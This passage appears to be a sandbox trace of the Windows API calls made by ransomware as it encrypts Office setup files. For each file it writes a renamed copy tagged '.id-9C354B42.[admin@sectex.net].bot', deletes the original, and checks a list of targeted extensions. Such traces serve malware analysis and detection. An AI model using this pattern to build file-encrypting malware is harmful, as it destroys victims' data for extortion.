	[0037.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.768] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=819) returned 1
	[0037.768] CloseHandle (hObject=0x1b0) returned 1
	[0037.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20
	[0037.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.768] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.768] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.769] GetLastError () returned 0x0
	[0037.769] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x333, lpOverlapped=0x0) returned 1
	[0037.770] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x340, lpOverlapped=0x0) returned 1
	[0037.771] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.771] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0037.771] SetEndOfFile (hFile=0x1c0) returned 1
	[0037.771] CloseHandle (hObject=0x1c0) returned 1
	[0037.772] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.772] SetEndOfFile (hFile=0x1b0) returned 1
	[0037.773] CloseHandle (hObject=0x1b0) returned 1
	[0037.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.773] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1
	[0037.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.773] lstrlenW (lpString=".doc") returned 4
	[0037.773] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.773] lstrlenW (lpString=".docx") returned 5
	[0037.773] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1
	[0037.773] lstrlenW (lpString=".pdf") returned 4
	[0037.773] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.773] lstrlenW (lpString=".xls") returned 4
	[0037.773] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.773] lstrlenW (lpString=".xlsx") returned 5
	[0037.773] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1
	[0037.774] lstrlenW (lpString=".ppt") returned 4
	[0037.774] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString=".zip") returned 4
	[0037.774] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.774] lstrlenW (lpString=".rar") returned 4
	[0037.774] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString=".bz2") returned 4
	[0037.774] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString=".7z") returned 3
	[0037.774] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString=".dbf") returned 4
	[0037.774] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString=".1cd") returned 4
	[0037.774] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString=".jpg") returned 4
	[0037.774] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.774] lstrlenW (lpString=".doc") returned 4
	[0037.774] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString=".docx") returned 5
	[0037.774] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1
	[0037.774] lstrlenW (lpString=".pdf") returned 4
	[0037.774] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString=".xls") returned 4
	[0037.774] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.774] lstrlenW (lpString=".xlsx") returned 5
	[0037.774] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1
	[0037.775] lstrlenW (lpString=".ppt") returned 4
	[0037.775] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.775] lstrlenW (lpString=".zip") returned 4
	[0037.775] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.775] lstrlenW (lpString=".rar") returned 4
	[0037.775] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.775] lstrlenW (lpString=".bz2") returned 4
	[0037.775] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.775] lstrlenW (lpString=".7z") returned 3
	[0037.775] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.775] lstrlenW (lpString=".dbf") returned 4
	[0037.775] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.775] lstrlenW (lpString=".1cd") returned 4
	[0037.775] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109
	[0037.775] lstrlenW (lpString=".jpg") returned 4
	[0037.775] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.775] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0037.775] lstrlenW (lpString="PSCONFIG.CHM") returned 12
	[0037.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.776] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=37689) returned 1
	[0037.776] CloseHandle (hObject=0x1b0) returned 1
	[0037.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20
	[0037.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.776] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.776] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.777] GetLastError () returned 0x0
	[0037.777] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x9339, lpOverlapped=0x0) returned 1
	[0037.779] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x9340, lpOverlapped=0x0) returned 1
	[0037.781] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.781] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0037.781] SetEndOfFile (hFile=0x1c0) returned 1
	[0037.781] CloseHandle (hObject=0x1c0) returned 1
	[0037.782] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.782] SetEndOfFile (hFile=0x1b0) returned 1
	[0037.783] CloseHandle (hObject=0x1b0) returned 1
	[0037.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.783] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1
	[0037.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.783] lstrlenW (lpString=".doc") returned 4
	[0037.783] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.783] lstrlenW (lpString=".docx") returned 5
	[0037.784] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1
	[0037.784] lstrlenW (lpString=".pdf") returned 4
	[0037.784] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString=".xls") returned 4
	[0037.784] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString=".xlsx") returned 5
	[0037.784] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1
	[0037.784] lstrlenW (lpString=".ppt") returned 4
	[0037.784] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString=".zip") returned 4
	[0037.784] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString=".rar") returned 4
	[0037.784] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString=".bz2") returned 4
	[0037.784] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.784] lstrlenW (lpString=".7z") returned 3
	[0037.784] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString=".dbf") returned 4
	[0037.784] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString=".1cd") returned 4
	[0037.784] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString=".jpg") returned 4
	[0037.784] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.784] lstrlenW (lpString=".doc") returned 4
	[0037.784] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.784] lstrlenW (lpString=".docx") returned 5
	[0037.784] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1
	[0037.784] lstrlenW (lpString=".pdf") returned 4
	[0037.785] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString=".xls") returned 4
	[0037.785] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString=".xlsx") returned 5
	[0037.785] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1
	[0037.785] lstrlenW (lpString=".ppt") returned 4
	[0037.785] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.785] lstrlenW (lpString=".zip") returned 4
	[0037.785] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString=".rar") returned 4
	[0037.785] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString=".bz2") returned 4
	[0037.785] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.785] lstrlenW (lpString=".7z") returned 3
	[0037.785] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.785] lstrlenW (lpString=".dbf") returned 4
	[0037.785] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.785] lstrlenW (lpString=".1cd") returned 4
	[0037.785] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105
	[0037.785] lstrlenW (lpString=".jpg") returned 4
	[0037.785] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.785] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0037.786] lstrlenW (lpString="PSS10O.CHM") returned 10
	[0037.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.786] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=26929) returned 1
	[0037.786] CloseHandle (hObject=0x1b0) returned 1
	[0037.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20
	[0037.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.786] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.786] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.786] GetLastError () returned 0x0
	[0037.786] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x6931, lpOverlapped=0x0) returned 1
	[0038.132] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x6940, lpOverlapped=0x0) returned 1
	[0038.134] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.134] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0038.134] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.134] CloseHandle (hObject=0x1c0) returned 1
	[0038.135] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.135] SetEndOfFile (hFile=0x1b0) returned 1
	[0038.136] CloseHandle (hObject=0x1b0) returned 1
	[0038.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.137] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 1
	[0038.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.137] lstrlenW (lpString=".doc") returned 4
	[0038.137] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString=".docx") returned 5
	[0038.137] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1
	[0038.137] lstrlenW (lpString=".pdf") returned 4
	[0038.137] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString=".xls") returned 4
	[0038.137] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString=".xlsx") returned 5
	[0038.137] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1
	[0038.137] lstrlenW (lpString=".ppt") returned 4
	[0038.137] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.137] lstrlenW (lpString=".zip") returned 4
	[0038.137] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString=".rar") returned 4
	[0038.137] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0038.137] lstrlenW (lpString=".bz2") returned 4
	[0038.137] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0038.137] lstrlenW (lpString=".7z") returned 3
	[0038.137] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0038.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".dbf") returned 4
	[0038.138] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".1cd") returned 4
	[0038.138] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".jpg") returned 4
	[0038.138] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".doc") returned 4
	[0038.138] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString=".docx") returned 5
	[0038.138] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1
	[0038.138] lstrlenW (lpString=".pdf") returned 4
	[0038.138] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString=".xls") returned 4
